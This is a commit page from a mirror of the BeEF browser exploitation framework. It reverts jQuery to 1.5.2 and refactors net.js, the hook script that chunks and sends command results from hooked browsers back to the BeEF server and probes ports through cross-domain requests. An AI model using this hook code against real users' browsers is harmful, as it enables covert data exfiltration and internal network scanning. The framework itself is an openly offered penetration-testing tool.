Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

(Fixes issue 456) reverted back to jQuery 1.5.2, moved port status checking code in 'complete' handler

Browse Source 
git-svn-id: https://beef.googlecode.com/svn/trunk@1284 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
This commit is contained in:
antisnatchor@gmail.com
2011-09-13 18:50:12 +00:00
parent f3079cd0c4
commit d33e9f88b5
4 changed files with 146 additions and 187 deletions
Download Patch File Download Diff File Expand all files Collapse all files

16
core/main/client/lib/jquery-1.5.2.min.js vendored Normal file
View File

File diff suppressed because one or more lines are too long

18
core/main/client/lib/jquery-1.6.2.min.js vendored
View File

File diff suppressed because one or more lines are too long

297
core/main/client/net.js
View File

@@ -19,15 +19,15 @@
* Provides basic networking functions.
*/
beef.net = {
host: "<%= @beef_host %>",
port: "<%= @beef_port %>",
hook: "<%= @beef_hook %>",
hook: "<%= @beef_hook %>",
handler: '/dh',
chop: 500,
pad: 30, //this is the amount of padding for extra params such as pc, pid and sid
sid_count: 0,
cmd_queue: [],
cmd_queue: [],
//Command object
command: function() {
@@ -49,14 +49,14 @@ beef.net = {
this.packets = [];
this.pc = 0;
this.get_base_url_length = function() {
return (this.url+this.handler+'?'+'bh='+beef.session.get_hook_session_id()).length;
return (this.url + this.handler + '?' + 'bh=' + beef.session.get_hook_session_id()).length;
},
this.get_packet_data = function() {
var p = this.packets.shift();
return {'bh':beef.session.get_hook_session_id(), 'sid':this.id, 'pid':p.id, 'pc':this.pc, 'd':p.data }
};
this.get_packet_data = function() {
var p = this.packets.shift();
return {'bh':beef.session.get_hook_session_id(), 'sid':this.id, 'pid':p.id, 'pc':this.pc, 'd':p.data }
};
},
/**
* Response Object - used in the beef.net.request callback
* Note: as we are using async mode, the response object will be empty if returned.Using sync mode, request obj fields will be populated.
@@ -73,9 +73,8 @@ beef.net = {
},
//Queues the command, to be sent back to the framework on the next refresh
queue: function(handler, cid, results, callback) {
if (typeof(handler) === 'string' && typeof(cid) === 'number' && (callback === undefined || typeof(callback) === 'function'))
{
queue: function(handler, cid, results, callback) {
if (typeof(handler) === 'string' && typeof(cid) === 'number' && (callback === undefined || typeof(callback) === 'function')) {
var s = new beef.net.command();
s.cid = cid;
s.results = beef.net.clean(results);
@@ -83,7 +82,7 @@ beef.net = {
s.handler = handler;
this.cmd_queue.push(s);
}
},
},
//Queues the current command and flushes the queue straight away
send: function(handler, cid, results, callback) {
@@ -93,8 +92,7 @@ beef.net = {
//Flush all currently queued commands to the framework
flush: function() {
if (this.cmd_queue.length > 0)
{
if (this.cmd_queue.length > 0) {
var data = beef.encode.base64.encode(beef.encode.json.stringify(this.cmd_queue));
this.cmd_queue.length = 0;
this.sid_count++;
@@ -102,14 +100,12 @@ beef.net = {
stream.id = this.sid_count;
var pad = stream.get_base_url_length() + this.pad;
//cant continue if chop amount is too low
if ((this.chop - pad) > 0)
{
if ((this.chop - pad) > 0) {
var data = this.chunk(data, (this.chop - pad));
for (var i = 1; i <= data.length; i++)
{
for (var i = 1; i <= data.length; i++) {
var packet = new this.packet();
packet.id = i;
packet.data = data[(i-1)];
packet.data = data[(i - 1)];
stream.packets.push(packet);
}
stream.pc = stream.packets.length;
@@ -120,102 +116,86 @@ beef.net = {
//Split string into chunk lengths determined by amount
chunk: function(str, amount) {
if (typeof amount == 'undefined') n=2;
return str.match(RegExp('.{1,'+amount+'}','g'));
if (typeof amount == 'undefined') n = 2;
return str.match(RegExp('.{1,' + amount + '}', 'g'));
},
//Push packets to framework
push: function(stream) {
//need to implement wait feature here eventually
for (var i = 0; i < stream.pc; i++)
{
for (var i = 0; i < stream.pc; i++) {
this.request('http', 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null);
}
},
/**
*Performs http requests
* @param: {String} scheme: HTTP or HTTPS
* @param: {String} method: GET or POST
* @param: {String} domain: bindshell.net, 192.168.3.4, etc
* @param: {Int} port: 80, 5900, etc
* @param: {String} path: /path/to/resource
* @param: {String} anchor: this is the value that comes after the # in the URL
* @param: {String} data: This will be used as the query string for a GET or post data for a POST
* @param: {Int} timeout: timeout the request after N seconds
* @param: {String} dataType: specify the data return type expected (ie text/html/script)
* @param: {Function} callback: call the callback function at the completion of the method
*
* @return: {Object} response: this object contains the response details
*/
request: function(scheme, method, domain, port, path, anchor, data, timeout, dataType, callback) {
//check if same domain or cross domain
*Performs http requests
* @param: {String} scheme: HTTP or HTTPS
* @param: {String} method: GET or POST
* @param: {String} domain: bindshell.net, 192.168.3.4, etc
* @param: {Int} port: 80, 5900, etc
* @param: {String} path: /path/to/resource
* @param: {String} anchor: this is the value that comes after the # in the URL
* @param: {String} data: This will be used as the query string for a GET or post data for a POST
* @param: {Int} timeout: timeout the request after N seconds
* @param: {String} dataType: specify the data return type expected (ie text/html/script)
* @param: {Function} callback: call the callback function at the completion of the method
*
* @return: {Object} response: this object contains the response details
*/
request: function(scheme, method, domain, port, path, anchor, data, timeout, dataType, callback) {
//check if same domain or cross domain
cross_domain = !((document.domain == domain) && ((document.location.port == port) || (document.location.port == "" && port == "80")));
//build the url
var url = scheme+"://"+domain;
url = (port != null) ? url+":"+port : url;
url = (path != null) ? url+path : url;
url = (anchor != null) ? url+"#"+anchor : url;
var url = scheme + "://" + domain;
url = (port != null) ? url + ":" + port : url;
url = (path != null) ? url + path : url;
url = (anchor != null) ? url + "#" + anchor : url;
//define response object
var response = new this.response;
response.was_cross_domain = cross_domain;
var start_time = new Date().getTime();
//define response object
var response = new this.response;
response.was_cross_domain = cross_domain;
var start_time = new Date().getTime();
//configure the ajax object for dataType
if(dataType == null){
/*
* For Cross-Domain XHR always use dataType: script,
* otherwise even if the HTTP resp is 200, jQuery.ajax will always launch the error() event
*/
if(cross_domain){
$j.ajaxSetup({
dataType: 'script'
//build and execute the request
$j.ajax({type: method,
dataType: 'script', // this is required for bugs in IE so data can be transferred back to the server
url: url,
data: data,
timeout: (timeout * 1000),
success: function(data, textStatus, xhr) {
var end_time = new Date().getTime();
response.status_code = textStatus;
response.response_body = data;
response.port_status = "open";
response.was_timedout = false;
response.duration = (end_time - start_time);
},
error: function(jqXHR, textStatus, errorThrown) {
var end_time = new Date().getTime();
response.status_code = jqXHR.status;
response.response_body = jqXHR.responseText;
response.duration = (end_time - start_time);
},
complete: function(jqXHR, textStatus) {
response.status_code = jqXHR.status;
// determine if TCP port is open/closed/not-http
if (textStatus == "timeout") {
response.was_timedout = true;
response.port_status = "closed";
} else if (textStatus == "parsererror")
response.port_status = "not-http";
else
response.port_status = "open";
}
}).done(function() {
if (callback != null) {
callback(response);
}
});
}
// if the request is not crossdomain, let jQuery infer the dataType based on the MIME type of the response
}else{
//if the dataType is explicitly set, let use it
$j.ajaxSetup({
dataType: dataType
});
}
//build and execute the request
$j.ajax({type: method,
dataType: 'script', // this is required for bugs in IE so data can be transfered back to the server
url: url,
data: data,
timeout: (timeout * 1000),
//function on success
success: function(data, textStatus, xhr){
var end_time = new Date().getTime();
response.status_code = textStatus;
response.response_body = data;
response.port_status = "open";
response.was_timedout = false;
response.duration = (end_time - start_time);
},
//function on failure
error: function(jqXHR, textStatus, errorThrown){
var end_time = new Date().getTime();
if (textStatus == "timeout") { response.was_timedout = true; response.port_status = "closed"; } else if (textStatus == "parsererror") response.port_status = "not http"; else response.port_status = "open";
response.status_code = jqXHR.status;
response.response_body = jqXHR.responseText;
response.status_code = textStatus;
response.duration = (end_time - start_time);
},
//function on completion
complete: function(transport) {
response.status_code = transport.status;
}
}).done(function() { if (callback != null) { callback(response); } });
return response;
},
return response;
},
/*
* Similar to this.request, except from a few things that are needed when dealing with proxy requests:
@@ -225,18 +205,18 @@ beef.net = {
* Firefox and Chrome automatically requests /safebrowsing/downloads (XHR)
*/
proxyrequest: function(scheme, method, domain, port, path, anchor, data, timeout, dataType, requestid, callback) {
//check if same domain or cross domain
//check if same domain or cross domain
cross_domain = !((document.domain == domain) && ((document.location.port == port) || (document.location.port == "" && port == "80")));
//build the url
var url = scheme+"://"+domain;
url = (port != null) ? url+":"+port : url;
url = (path != null) ? url+path : url;
url = (anchor != null) ? url+"#"+anchor : url;
var url = scheme + "://" + domain;
url = (port != null) ? url + ":" + port : url;
url = (path != null) ? url + path : url;
url = (anchor != null) ? url + "#" + anchor : url;
//define response object
var response = new this.response;
response.was_cross_domain = cross_domain;
//define response object
var response = new this.response;
response.was_cross_domain = cross_domain;
// if the request is crossdomain, don't proceed and return
if (cross_domain && callback != null) {
@@ -247,66 +227,47 @@ beef.net = {
return response;
}
var start_time = new Date().getTime();
var start_time = new Date().getTime();
//configure the ajax object for dataType
if(dataType == null){
/*
* For Cross-Domain XHR always use dataType: script,
* otherwise even if the HTTP resp is 200, jQuery.ajax will always launch the error() event
*/
if(cross_domain){
$j.ajaxSetup({
dataType: 'script'
});
}
//build and execute the request
$j.ajax({type: method,
dataType: 'script', // this is required for bugs in IE so data can be transfered back to the server
url: url,
data: data,
timeout: (timeout * 1000),
// if the request is not crossdomain, let jQuery infer the dataType based on the MIME type of the response
}else{
//if the dataType is explicitly set, let use it
$j.ajaxSetup({
dataType: dataType
});
}
//build and execute the request
$j.ajax({type: method,
dataType: 'script', // this is required for bugs in IE so data can be transfered back to the server
url: url,
data: data,
timeout: (timeout * 1000),
//function on success
success: function(data, textStatus, xhr){
var end_time = new Date().getTime();
response.status_code = xhr.status;
response.status_text = textStatus;
response.response_body = data;
response.port_status = "open";
response.was_timedout = false;
response.duration = (end_time - start_time);
},
//function on failure
error: function(xhr, textStatus, errorThrown){
var end_time = new Date().getTime();
if (textStatus == "timeout") { response.was_timedout = true; response.port_status = "closed"; } else if (textStatus == "parsererror") response.port_status = "not http"; else response.port_status = "open";
response.response_body = xhr.responseText;
response.status_code = xhr.status;
response.status_text = textStatus;
response.duration = (end_time - start_time);
},
//function on completion
complete: function(xhr, textStatus) {
response.status_code = xhr.status;
response.status_text = textStatus;
response.headers = xhr.getAllResponseHeaders();
callback(response, requestid);
}
});
return response;
success: function(data, textStatus, xhr) {
var end_time = new Date().getTime();
response.status_code = xhr.status;
response.status_text = textStatus;
response.response_body = data;
response.was_timedout = false;
response.duration = (end_time - start_time);
},
error: function(xhr, textStatus, errorThrown) {
var end_time = new Date().getTime();
response.response_body = xhr.responseText;
response.status_code = xhr.status;
response.status_text = textStatus;
response.duration = (end_time - start_time);
},
complete: function(xhr, textStatus) {
response.status_code = xhr.status;
response.status_text = textStatus;
response.headers = xhr.getAllResponseHeaders();
// determine if TCP port is open/closed/not-http
if (textStatus == "timeout") {
response.was_timedout = true;
response.port_status = "closed";
} else if (textStatus == "parsererror")
response.port_status = "not-http";
else
response.port_status = "open";
callback(response, requestid);
}
});
return response;
},
//this is a stub, as associative arrays are not parsed by JSON, all key / value pairs should use new Object() or {}
@@ -323,12 +284,12 @@ beef.net = {
//Detects if an array has a string key
array_has_string_key: function(arr) {
if ($j.isArray(arr))
{
if ($j.isArray(arr)) {
try {
for (var key in arr)
if (isNaN(parseInt(key))) return true;
} catch (e) { }
} catch (e) {
}
}
return false;
},

2
core/main/handlers/modules/beefjs.rb
View File

@@ -34,7 +34,7 @@ module Modules
# set up values required to construct beefjs
beefjs = '' # init the beefjs string (to be sent as the beefjs file)
beefjs_path = "#{$root_dir}/core/main/client/" # location of sub files
js_sub_files = %w(lib/jquery-1.6.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js session.js os.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js)
js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js session.js os.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js)
# construct the beefjs string from file(s)
js_sub_files.each {|js_sub_file_name|